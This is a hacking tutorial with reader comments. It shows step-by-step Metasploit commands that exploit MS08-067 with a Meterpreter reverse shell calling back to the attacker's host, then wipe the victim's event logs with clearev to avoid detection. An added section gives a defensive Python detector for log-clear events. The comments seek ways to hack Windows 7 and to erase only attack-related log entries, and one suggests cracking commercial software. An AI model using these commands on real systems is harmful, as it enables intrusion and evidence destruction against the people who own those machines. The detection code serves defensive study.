Welcome back, my greenhorn hackers!
Congratulations on your successful hack that saved the world from nuclear annihilation by our little, bellicose, Twinkie-eating dictator. The rest of the world may not know what you did, but I do. Good job!
Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.
So, in this hack, we will go into his computer again, implant the Meterpreter and remove any trace that we had been there from his log files. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.
Step 1: Compromise His System Again
Let's start with the same hack we used to get into the dictator's computer initially:
exploit/windows/smb/ms08_067_netapi
But instead of using the VNC payload, we will load the Meterpreter payload. Type:
- msf> use exploit/windows/smb/ms08_067_netapi
Before we move on, let's learn a bit more about this exploit. Type:
- msf exploit(ms08_067_netapi) > info
This brings up the information shown in the screenshot below, which gives us some basics about the exploit. We can see that it abuses a parsing flaw in the netapi32.dll library; through that flaw we can place our own payload on the system, which in this case is the Meterpreter.
Now we load the payload by typing:
- msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Now that we have the exploit and payload set, we need to set the options. In this case, we need to set LHOST (us, the attacker) and RHOST (the victim, our belligerent dictator's computer). Set LHOST to the IP address of your computer and RHOST to the IP address of his.
Step 2: Take Control of His Computer
Now that we have everything set to take control, we just type:
- msf exploit(ms08_067_netapi) > exploit
If we are successful, we should see a Meterpreter prompt on our screen. We now have total control of his system!
At the meterpreter prompt, we now type:
- meterpreter > clearev
As you can see in the screenshot above, this command clears the event logs on our bellicose dictator's computer so that he and his minions have no clue that we've ever been there. If we could look at the event logs on his computer, we would see that all events have been cleared.
This is critical both to keep us from being found out and to preserve our continued access to his computer. Once they know that someone has hacked it, they will likely take measures to keep us from returning.
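Before moving on, it is worth seeing what clearev looks like from the other side of the fence. Wiping an event log is itself a logged action on Windows: clearing the Security log produces Event ID 1102 ("The audit log was cleared") in the Security log, and clearing any other log produces Event ID 104 in the System log, with the name of the cleared log in the event data. Because clearev empties Application, System and Security one after the other, a defender shipping logs to a central collector sees three clear events on one host within seconds. The script below is an added example, not code from the Null Byte post or from Metasploit; it runs a simple detector over a constructed, line-delimited JSON export (host names, users and timestamps are made up, the event IDs are the real documented ones), flags every individual clear and raises an alert when several logs are cleared in a short window.

```python
import json
from collections import defaultdict
from datetime import datetime, timezone

# Event IDs Windows itself writes when a log is cleared (documented IDs).
# Everything else in this block (hosts, users, times) is constructed sample data.
SECURITY_LOG_CLEARED = 1102   # written to the Security log by Microsoft-Windows-Eventlog
OTHER_LOG_CLEARED = 104       # written to the System log by Microsoft-Windows-Eventlog

# Constructed export: one JSON object per line, a simplified version of what a
# SIEM or a Get-WinEvent | ConvertTo-Json pipeline might hand you.
SAMPLE_EXPORT = """\
{"time": "2024-05-01T10:14:03Z", "host": "DICT-PC", "log": "Security", "id": 4624, "channel": null, "user": "kim"}
{"time": "2024-05-01T10:14:05Z", "host": "DICT-PC", "log": "Security", "id": 4688, "channel": null, "user": "kim"}
{"time": "2024-05-01T10:20:31Z", "host": "DICT-PC", "log": "System", "id": 104, "channel": "Application", "user": "SYSTEM"}
{"time": "2024-05-01T10:20:31Z", "host": "DICT-PC", "log": "System", "id": 104, "channel": "System", "user": "SYSTEM"}
{"time": "2024-05-01T10:20:32Z", "host": "DICT-PC", "log": "Security", "id": 1102, "channel": "Security", "user": "SYSTEM"}
{"time": "2024-05-01T11:00:00Z", "host": "ADMIN-WS", "log": "System", "id": 104, "channel": "Application", "user": "admin"}
"""


def parse_events(text):
    """Parse the line-delimited JSON export into dicts with a real UTC datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(ev)
    return events


def is_log_clear(ev):
    """True for the two events Windows records when an event log is cleared."""
    return (ev["log"] == "Security" and ev["id"] == SECURITY_LOG_CLEARED) or \
           (ev["log"] == "System" and ev["id"] == OTHER_LOG_CLEARED)


def find_log_clears(events):
    """Every individual log-clear event, oldest first; each one deserves a look."""
    return sorted((e for e in events if is_log_clear(e)), key=lambda e: e["time"])


def detect_mass_clear(events, window_seconds=10, min_channels=3):
    """
    Alert on a host where at least `min_channels` distinct logs were cleared
    within `window_seconds`. clearev clears Application, System and Security
    back to back, so three channels inside a few seconds is its footprint,
    while an admin clearing one noisy log by hand does not trip this rule.
    """
    clears_by_host = defaultdict(list)
    for ev in find_log_clears(events):
        clears_by_host[ev["host"]].append(ev)

    alerts = []
    for host, clears in clears_by_host.items():
        for i, first in enumerate(clears):
            window = [c for c in clears[i:]
                      if (c["time"] - first["time"]).total_seconds() <= window_seconds]
            channels = {c["channel"] for c in window}
            if len(channels) >= min_channels:
                alerts.append({"host": host, "start": first["time"],
                               "channels": sorted(channels),
                               "users": sorted({c["user"] for c in window})})
                break  # one alert per host per burst is enough
    return alerts


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EXPORT)
    for c in find_log_clears(evs):
        print(f"{c['time']:%H:%M:%S} {c['host']}: {c['channel']} log cleared by {c['user']}")
    for a in detect_mass_clear(evs):
        print(f"ALERT {a['host']}: {', '.join(a['channels'])} cleared within seconds by {', '.join(a['users'])}")
```

On the sample data the single Application-log clear on ADMIN-WS is listed but not alerted, while DICT-PC trips the mass-clear rule. The obvious caveat is that this only helps if the events leave the box before they are wiped, which is why forwarding logs to a collector the compromised host cannot reach is the real mitigation.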
Now, make sure to come back for more hacking fun and games on our dictator's computer!
49 Comments
What is BackTrack 5? I always see it up when you use Metasploit. Do we need it?
Hi Ben:
Back Track 5 is a Linux distribution with hundreds of hacking and security tools. No, you don't need it, but I recommend it.
OTW
Hi, I know this does not have to do with this article, but I have been wondering this. When I download Metasploit, it asks for the port, days of validity, and server name. What does this mean for my router? Will it cost extra? Will it show up as an open port on the router? Sorry if this sounds newbie, I am new to this, and I would like help so I can get better.
Ben:
Are you downloading it to Windows? Or are you downloading Armitage?
You are better off just installing Back Track, but you will need to know a bit of Linux.
OTW
Oh, sorry. I'm using Windows 7.
Are you really hacking into the dictator's computer, or is it a joke?
Aditya:
We really hacked into the dictator's computer and saved the world ;-)
loooool
k
Hey, I would like to use BackTrack on Mac. Is that possible?
everything is possible with VMware OR VirtualBox!
I recommend VMware (you can just crack it...)
:-)
Hi sir, hope you are fine.
After typing the exploit command it gives me this error:
exploit exceptions: no matching target
It means there is no computer with that IP.
You must do this:
set lport 4444
set lhost (there you put your target's IP)
Wajid:
It looks like you are attacking a Win 7 machine. Is that correct?
OTW
Yes. What is wrong with that? Do you know any solution for that?
Wijid:
This attack is not for Windows 7. It only works for XP, 2003, Vista and some 2008.
OTW
So can you show me how to hack Windows 7 Enterprise 32-bit, and Windows 8?
Can I hack Windows 7? If yes, then how?
Are you there, sir? I am waiting for your comment.
Wajid:
There are a number of different ways to hack Win 7, but they usually involve hacking one of the client-side applications like the browser, Office or a PDF. I have a few tutorials on doing each of these on Null Byte. In addition, there is a brand new hack of Win 7 out that I will put up soon.
OTW
Then I should wait, right?
One more thing: can you show how to install TightVNC on BackTrack 5?
Hey, this works only in a virtual machine; it doesn't work between 2 computers.
If this is that easy, then why do the most sophisticated hackers get caught?
Wajid:
Yes, you should wait or look at my tutorials on PDF or Word docs.
These work on either virtual machine or physical machine.
This just shows you a few techniques of covering your tracks. There are more that I will write about in the future. BTW, most sophisticated hackers do NOT get caught. It's the script kiddies that get caught.
OTW
Hi sir! Hope you are fine and enjoying good health.
My question is that I can't find some of the options in BackTrack 5. Currently I don't know whether they are missing from BackTrack 5 or whether I must download them. Some of the missing files are wordlist.lst, wifi-honey, fern-wifi-cracker, host, pyrit, reaver, wifite, etc.
I upgraded and updated BackTrack 5 R3 as well, but nothing happens.
Could you give a little bit of instruction about it, please?
Thanks
Wajid:
Try using the "locate" command to find those apps and files.
OTW
You mean Ctrl+F or search, right?
The search option didn't find it as well.
Wajid:
I meant using the locate command in Linux. For example:
bt> locate reaver
OTW
Please sir, I am new to your forum. Please, how can I get the link to the previous tutorial?
Horls:
What previous tutorial are you looking for?
OTW
This tutorial is about covering tracks, so I am asking for the tutorial where the attack was performed. I would also be glad if you could help me with a tutorial on how to attack a Win 7 computer or higher.
Horls:
I have numerous attack tutorials, but this one is from here.
OTW
thank you sir
Sir OTW
Will Meterpreter still work as it should even if I use a VPN to somehow disguise my real IP?
yes
I really wish someone would do these tutorials using a Windows computer. I realize it's the hacker's choice to use Linux and BackTrack, but unfortunately not all of us have it. Also, you can't even use Metasploit unless you have a minimum of 16 GB on your computer. Not very many people have that type of RAM, and even fewer realize that is the requirement.
I'm impressed with your patience, OTW!
Will this hack only work if port 445 is open? When I used nmap to scan to see if it was open, it didn't say open or closed, it said filtered. I've read a lot of your tutorials but you have never mentioned (to my knowledge) what the filtered status means. Can you use a hack over a "filtered" port? Any response would be appreciated.
Turkey:
Port 445 must be open, but that is usually not a problem as nearly every Windows machine has port 445 open (SMB). Filtered means that there is likely a firewall between you and the target.
OTW
Thank you for clarifying
Read a comment farther up:
SniperCatz said you need a minimum of "16 gb" on your computer to run Metasploit.
Did they mean 16 GB of RAM or 16 GB of hard-disk space?
Neither. Some people's comments are simply inaccurate.
Okay, thank you!
I agree. SniperCatz is wrong.
FYI, Ninja, he was saying RAM: "Not very many people have that type of RAM."
Ah woops, I missed that.
Metasploit takes less than 1 GB of hard drive space, and although Rapid7 lists 2 GB as the minimum RAM, I would recommend 4 GB or more.
Is there any way to hack Windows 7 remotely?
How do you delete the logs specific to our hack instead of deleting the full log file?
I know it's possible. I read an article long ago: one hacker tried to cover his tracks by deleting the logs specific to his hack, but unfortunately he accidentally deleted some important backup logs and got caught.
What is the dictator's IP address, or is it just your computer?
And if so, can I hack it as long as I don't break it?